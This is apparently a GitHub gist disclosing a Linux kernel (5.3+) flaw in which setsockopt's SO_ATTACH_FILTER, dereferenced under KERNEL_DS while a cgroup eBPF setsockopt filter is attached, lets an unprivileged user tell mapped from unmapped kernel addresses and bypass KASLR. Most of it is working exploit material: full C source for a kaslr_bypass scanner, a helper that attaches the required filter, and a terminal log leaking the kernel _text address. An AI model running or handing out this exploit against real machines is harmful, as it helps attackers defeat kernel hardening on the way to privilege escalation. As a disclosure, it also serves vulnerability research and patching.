Ga-ryo/ Secret

Created Feb 12, 2021
Linux Kernel setsockopt System Call Untrusted Pointer Dereference Information Disclosure Vulnerability


Since Linux kernel 5.3, a user with the CAP_NET_ADMIN capability can attach an eBPF filter to the setsockopt() syscall by using the BPF_CGROUP_SETSOCKOPT attach type.

This feature hooks the setsockopt() syscall for any socket that belongs to the target cgroup (the root cgroup works too).

If any filter is attached to the cgroup, an attacker can check whether a given kernel address is mapped or not (and use that to bypass KASLR).


  1. The Linux kernel version is 5.3 or higher.

  2. A user with CAP_NET_ADMIN has attached an eBPF filter to the setsockopt() syscall. (Any filter is okay, but the attacker must be able to pass the attached filter.)

  3. The attacker already has an unprivileged shell.
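
The first precondition can be checked from a program as well as from the package list. The following is a minimal sketch, assuming the release string reported by uname(2) starts with "major.minor"; the helper names kernel_at_least and running_kernel_at_least are hypothetical and not part of the original exploit.

```c
#include <stdio.h>
#include <sys/utsname.h>

/* Hypothetical helper: returns 1 if a release string such as
 * "5.3.0-53-generic" is at least major.minor, 0 if it is older,
 * and -1 if the string cannot be parsed. */
int kernel_at_least(const char *release, int major, int minor)
{
    int maj = 0, min = 0;

    if (sscanf(release, "%d.%d", &maj, &min) != 2)
        return -1;
    if (maj != major)
        return maj > major;
    return min >= minor;
}

/* Hypothetical helper: applies the same check to the running kernel. */
int running_kernel_at_least(int major, int minor)
{
    struct utsname u;

    if (uname(&u) != 0)
        return -1;
    return kernel_at_least(u.release, major, minor);
}
```

Calling running_kernel_at_least(5, 3) on the Ubuntu 18.04 machine used below (release 5.3.0-53-generic) would report that the version precondition holds. It says nothing about the other two preconditions.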


The attacker can learn which kernel addresses (pages) are actually mapped.

This can be used to bypass KASLR.


In the setsockopt() syscall, the BPF_CGROUP_RUN_PROG_SETSOCKOPT() macro checks whether a setsockopt filter is attached. (The cgroup_bpf_enabled flag is incremented when a privileged user attaches an eBPF filter.)

If one is attached, the kernel passes the arguments to the attached eBPF filter and checks that the return value is not 0. (This lets a CAP_NET_ADMIN user flexibly restrict setsockopt() syscall parameters.)

Before running the eBPF filter, the kernel copies the arguments into kernel memory, because the user could otherwise change the values at any time (even after the filter has passed them).

Once the arguments are saved in kernel memory, copy_from_user() no longer works on them, because optval is no longer a userland address.

To work around this, the kernel calls set_fs(KERNEL_DS), which temporarily extends the accepted address range to cover kernel memory. (This hack is sometimes used to invoke syscalls from kernel land.)

That is basically okay, because optval is now definitely a kernel memory pointer.

But if the structure at *optval itself contains a pointer (which is expected to point into userland), this becomes abusable.

If an attacker places a malicious kernel pointer in that structure, copy_from_user() accepts it and reads from it, because set_fs(KERNEL_DS) is in effect.
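
The effect of set_fs(KERNEL_DS) on the address check can be illustrated with a small userland model. This is only a sketch and not kernel code: the model_* names are hypothetical, and the two limit constants are assumed x86_64 values that do not come from the write-up.

```c
#include <stdint.h>

/* Assumed x86_64 limits, used for illustration only. */
#define MODEL_USER_DS   0x00007ffffffff000ULL  /* top of userland */
#define MODEL_KERNEL_DS UINT64_MAX             /* no limit at all */

/* Models the per-task address limit that set_fs() changes. */
static uint64_t model_addr_limit = MODEL_USER_DS;

void model_set_fs(uint64_t limit)
{
    model_addr_limit = limit;
}

/* Returns 1 when [addr, addr + size) lies below the current limit,
 * which is the kind of range check copy_from_user() relies on. */
int model_access_ok(uint64_t addr, uint64_t size)
{
    if (size > model_addr_limit)
        return 0;
    return addr <= model_addr_limit - size;
}
```

With the limit at MODEL_USER_DS, a kernel address such as 0xffffffff9d200000 is rejected. After model_set_fs(MODEL_KERNEL_DS) the same address passes, which is why a nested pointer supplied by the attacker is no longer filtered out.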

The optval of SO_ATTACH_FILTER has such a pointer.

The kernel copies optval into fprog, a struct sock_fprog.

But fprog itself contains a pointer, the filter member.
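
For reference, struct sock_fprog from <linux/filter.h> holds an instruction count (len) and a pointer to the instructions (filter). The sketch below builds such an argument with an arbitrary address in the pointer field. The helper names make_probe and probe_read_size are hypothetical, and the read-size calculation assumes the kernel copies len classic BPF instructions starting at filter.

```c
#include <linux/filter.h>

/* Hypothetical helper: build an SO_ATTACH_FILTER argument whose
 * filter pointer is an arbitrary address chosen by the caller. */
struct sock_fprog make_probe(unsigned long addr, unsigned short len)
{
    struct sock_fprog prog = {
        .len = len,
        .filter = (struct sock_filter *)addr,
    };
    return prog;
}

/* Number of bytes that would be read from prog->filter, assuming
 * len instructions of sizeof(struct sock_filter) bytes each. */
unsigned long probe_read_size(const struct sock_fprog *prog)
{
    return (unsigned long)prog->len * sizeof(struct sock_filter);
}
```

With len set to 100, as in the exploit source, each probe covers 800 bytes starting at the chosen address.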

If the attacker sets a kernel pointer as the filter member, the kernel loads the filter from that kernel pointer and then checks whether it is a valid BPF filter.

If the kernel pointer is invalid (not mapped), the kernel returns EFAULT.

If the kernel pointer is valid, the validation will almost always fail, because the memory there is not a valid BPF filter.

In that case the kernel returns EINVAL.

So the attacker can now tell which addresses are valid (EINVAL is returned) and which are invalid (EFAULT is returned).
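
The decision rule above can be written as a small helper. This is a sketch only: the enum and the function name classify_probe are hypothetical, and anything other than EINVAL or EFAULT is treated as inconclusive.

```c
#include <errno.h>

enum probe_result {
    PROBE_UNKNOWN  = -1,  /* unexpected result, no conclusion */
    PROBE_UNMAPPED = 0,   /* kernel returned EFAULT */
    PROBE_MAPPED   = 1    /* kernel returned EINVAL */
};

/* Hypothetical helper: interpret the return value of setsockopt()
 * and the errno value observed right after the call. */
enum probe_result classify_probe(int ret, int err)
{
    if (ret >= 0)
        return PROBE_UNKNOWN;   /* the filter was actually accepted */
    if (err == EINVAL)
        return PROBE_MAPPED;    /* read succeeded, validation failed */
    if (err == EFAULT)
        return PROBE_UNMAPPED;  /* read from the address faulted */
    return PROBE_UNKNOWN;
}
```

A caller would pass the result of setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, ...) together with errno, for example classify_probe(ret, errno).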

Steps to reproduce

  1. Check the kernel version. (The exploit works on Ubuntu 18.04 after a kernel upgrade and reboot.)
garyo@garyo:~$ apt list "linux-image*" --installed | grep -v dbg
WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
linux-image-5.3.0-53-generic/bionic-updates,bionic-security,now 5.3.0-53.47~18.04.1 amd64 [installed]
  2. Set a filter on the root cgroup (to meet the precondition). This filter always returns 1.
garyo@garyo:~$ sudo ./set_meaningless_filter /sys/fs/cgroup/unified/
Output from kernel verifier:
0: (b7) r0 = 1
1: (95) exit
processed 2 insns (limit 1000000) max_states_per_insn 0 total_states 0 peak_states 0 mark_read 0
  3. Run the exploit. _text is at 0xffffffff9d200000, and the exploit reports a valid kernel address range starting at 0xffffffff9d200000. (The scan takes several minutes; to check quickly, change the interval from 0x100000 to a larger number.)
garyo@garyo:~$ ./kaslr_bypass 0xffff000000000000 0xffffffffffff0000 0x100000
 Checking addr from 0xffff000000000000 to 0xffffffffffff0000 by 0x100000bytes
 0xffff000000000000 : INvalid
 0xffff95e940000000 : valid
 0xffff95e9c0000000 : INvalid
 0xffffb00a80000000 : valid
 0xffffb00a80600000 : INvalid
 0xffffb00a80700000 : valid
 0xffffb00a80800000 : INvalid
 0xffffb00a88000000 : valid
 0xffffb00a90000000 : INvalid
 0xffffd00a7be00000 : valid
 0xffffd00a7fe00000 : INvalid
 0xffffe88b00000000 : valid
 0xffffe88b02000000 : INvalid
 0xfffffe0000000000 : valid
 0xfffffe0000600000 : INvalid
 0xfffffe0000700000 : valid
 0xfffffe0000800000 : INvalid
 0xfffffe0000900000 : valid
 0xfffffe0000a00000 : INvalid
 0xfffffe0000d00000 : valid
 0xfffffe0000e00000 : INvalid
 0xfffffe0000f00000 : valid
 0xfffffe0001000000 : INvalid
 0xfffffe0001100000 : valid
 0xfffffe0001200000 : INvalid
 0xfffffe0001300000 : valid
 0xfffffe0001400000 : INvalid
 0xffffffff9d200000 : valid
 0xffffffff9e100000 : INvalid
 0xffffffff9e200000 : valid
 0xffffffff9e700000 : INvalid
 0xffffffff9e800000 : valid
 0xffffffff9eb00000 : INvalid
 0xffffffff9ee00000 : valid
 0xffffffff9f400000 : INvalid
 0xffffffffc0400000 : valid
 0xffffffffc0900000 : INvalid
 garyo@garyo:~$ sudo cat /proc/kallsyms | grep "T _text"
 ffffffff9d200000 T _text
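
Once the randomized address of _text is known, the KASLR slide is a single subtraction. The sketch below assumes the default x86_64 link address of _text without KASLR, 0xffffffff81000000, which does not appear in the transcript above; the helper names kaslr_slide and rebase are hypothetical.

```c
#include <stdint.h>

/* Assumption: default x86_64 address of _text when KASLR is off. */
#define DEFAULT_TEXT_BASE 0xffffffff81000000ULL

/* Offset that KASLR added to the kernel text mapping. */
uint64_t kaslr_slide(uint64_t leaked_text)
{
    return leaked_text - DEFAULT_TEXT_BASE;
}

/* Hypothetical helper: relocate a symbol address taken from a
 * non-randomized layout into the randomized one. */
uint64_t rebase(uint64_t static_addr, uint64_t slide)
{
    return static_addr + slide;
}
```

For the run above, kaslr_slide(0xffffffff9d200000) gives 0x1c200000 under that assumption.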

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <arpa/inet.h>
#include <linux/if_ether.h>
#include <linux/filter.h>
#include <linux/kernel.h>
#include <netpacket/packet.h>
#include <net/if.h>

int sockets[2];

/* SO_ATTACH_FILTER argument; .filter is overwritten for every probe. */
struct sock_fprog bpf = {
    .len = 100,
    .filter = (struct sock_filter *)(0xffff888000000000),
    //.filter = code,
};

int main(int argc, char *argv[]){
    int soc;
    struct ifreq ifr;
    struct sockaddr_ll sll;
    unsigned char buf[4096];
    unsigned long start_addr, end_addr, interval;
    unsigned long cur_addr;
    int prev_status;

    memset(&ifr, 0, sizeof(ifr));
    memset(&sll, 0, sizeof(sll));

    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
        printf("failed to create socket pair '%s'\n", strerror(errno));
        return 1;
    }

    if(argc == 2){
        /* Single address: probe it exactly once. */
        bpf.filter = (struct sock_filter *)strtoul(argv[1], NULL, 0);
        printf("filter address is set to %p\n", (void *)bpf.filter);
        start_addr = end_addr = (unsigned long)bpf.filter;
        interval = 1;
    }else if(argc == 4){
        start_addr = strtoul(argv[1], NULL, 0);
        end_addr = strtoul(argv[2], NULL, 0);
        interval = strtoul(argv[3], NULL, 0);
        printf("Checking addr from %p to %p by %pbytes\n", (void *)start_addr, (void *)end_addr, (void *)interval);
    }else{
        puts("Usage: kaslr_bypass start_addr end_addr interval");
        return 1;
    }

    /* prev_status: -1 = nothing printed yet, 1 = valid, 0 = invalid.
     * A line is printed only when the status changes. */
    prev_status = -1;
    for(cur_addr=start_addr; cur_addr<=end_addr; cur_addr+=interval){
        bpf.filter = (struct sock_filter *)cur_addr;
        if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_FILTER, &bpf, sizeof(bpf)) < 0) {
            //printf("setsockopt '%s'\n", strerror(errno));
            if(errno == EINVAL){
                /* Read succeeded, filter validation failed: mapped. */
                if(prev_status != 1){
                    printf("%p : valid\n", (void *)cur_addr);
                    prev_status = 1;//set valid
                }
            }else if(errno == EFAULT){
                /* Read faulted: not mapped. */
                if(prev_status != 0){
                    printf("%p : INvalid\n", (void *)cur_addr);
                    prev_status = 0;//set invalid
                }
            }else{
                puts("Something went wrong");
                return 1;
            }
        }
        if(cur_addr>(cur_addr + interval)){
            //integer overflow
            break;
        }
    }
    return 0;
}

/* eBPF example program:
 * - Creates arraymap in kernel with 4 bytes keys and 8 byte values
 *   (the map is not used by the filter itself)
 * - Loads an eBPF program of type BPF_PROG_TYPE_CGROUP_SOCKOPT that
 *   always returns 1
 * - Attaches the new program to a cgroup using BPF_PROG_ATTACH with
 *   attach type BPF_CGROUP_SETSOCKOPT
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/unistd.h>
#include "linux/bpf.h"
#include "bpf/bpf.h"
#include "bpf_insn.h"

char bpf_log_buf[BPF_LOG_BUF_SIZE];

static __u64 ptr_to_u64(void *ptr)
{
    return (__u64) (unsigned long) ptr;
}

/* Calls BPF_PROG_LOAD directly so that expected_attach_type can be set. */
int bpf_prog_load_pwn(enum bpf_prog_type prog_type,
                      const struct bpf_insn *insns, int prog_len,
                      const char *license, int kern_version, int expected_attach_type)
{
    union bpf_attr attr = {
        .prog_type = prog_type,
        .insns = ptr_to_u64((void *) insns),
        .insn_cnt = prog_len / sizeof(struct bpf_insn),
        .license = ptr_to_u64((void *) license),
        .log_buf = ptr_to_u64(bpf_log_buf),
        .log_size = BPF_LOG_BUF_SIZE,
        .log_level = 1,
        .expected_attach_type = expected_attach_type,
    };

    attr.kern_version = kern_version;
    bpf_log_buf[0] = 0;

    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

static int prog_load(int map_fd, int verdict)
{
    /* map_fd and verdict are unused: the filter always returns 1. */
    struct bpf_insn prog2[] = {
        BPF_MOV64_IMM(BPF_REG_0, 1), /* r0 = 1 */
        BPF_EXIT_INSN(),
    };

    return bpf_prog_load_pwn(BPF_PROG_TYPE_CGROUP_SOCKOPT, prog2, sizeof(prog2), "GPL", 0, BPF_CGROUP_SETSOCKOPT);
}

static int usage(const char *argv0)
{
    printf("Usage: %s [-d] [-D] <cg-path> \n", argv0);
    printf(" -d Drop Traffic\n");
    printf(" -D Detach filter, and exit\n");
    return EXIT_FAILURE;
}

static int attach_filter(int cg_fd, int type, int verdict)
{
    int prog_fd, map_fd, ret, key;
    long long pkt_cnt, byte_cnt;

    map_fd = bpf_create_map(BPF_MAP_TYPE_ARRAY,
                            sizeof(key), sizeof(byte_cnt),
                            256, 0);
    if (map_fd < 0) {
        printf("Failed to create map: '%s'\n", strerror(errno));
        return EXIT_FAILURE;
    }

    prog_fd = prog_load(map_fd, verdict);
    printf("Output from kernel verifier:\n%s\n-------\n", bpf_log_buf);
    if (prog_fd < 0) {
        printf("Failed to load prog: '%s'\n", strerror(errno));
        return EXIT_FAILURE;
    }

    ret = bpf_prog_attach(prog_fd, cg_fd, type, 0);
    if (ret < 0) {
        printf("Failed to attach prog to cgroup: '%s'\n",
               strerror(errno));
        return EXIT_FAILURE;
    }

    return EXIT_SUCCESS;
}

int main(int argc, char **argv)
{
    int detach_only = 0, verdict = 1;
    enum bpf_attach_type type;
    int opt, cg_fd, ret;

    while ((opt = getopt(argc, argv, "Dd")) != -1) {
        switch (opt) {
        case 'd':
            verdict = 0;
            break;
        case 'D':
            detach_only = 1;
            break;
        default:
            return usage(argv[0]);
        }
    }

    if (argc - optind < 1)
        return usage(argv[0]);

    /* The filter is always attached to the setsockopt() hook. */
    type = BPF_CGROUP_SETSOCKOPT;

    cg_fd = open(argv[optind], O_DIRECTORY | O_RDONLY);
    if (cg_fd < 0) {
        printf("Failed to open cgroup path: '%s'\n", strerror(errno));
        return EXIT_FAILURE;
    }

    if (detach_only) {
        ret = bpf_prog_detach(cg_fd, type);
        printf("bpf_prog_detach() returned '%s' (%d)\n",
               strerror(errno), errno);
    } else
        ret = attach_filter(cg_fd, type, verdict);

    return ret;
}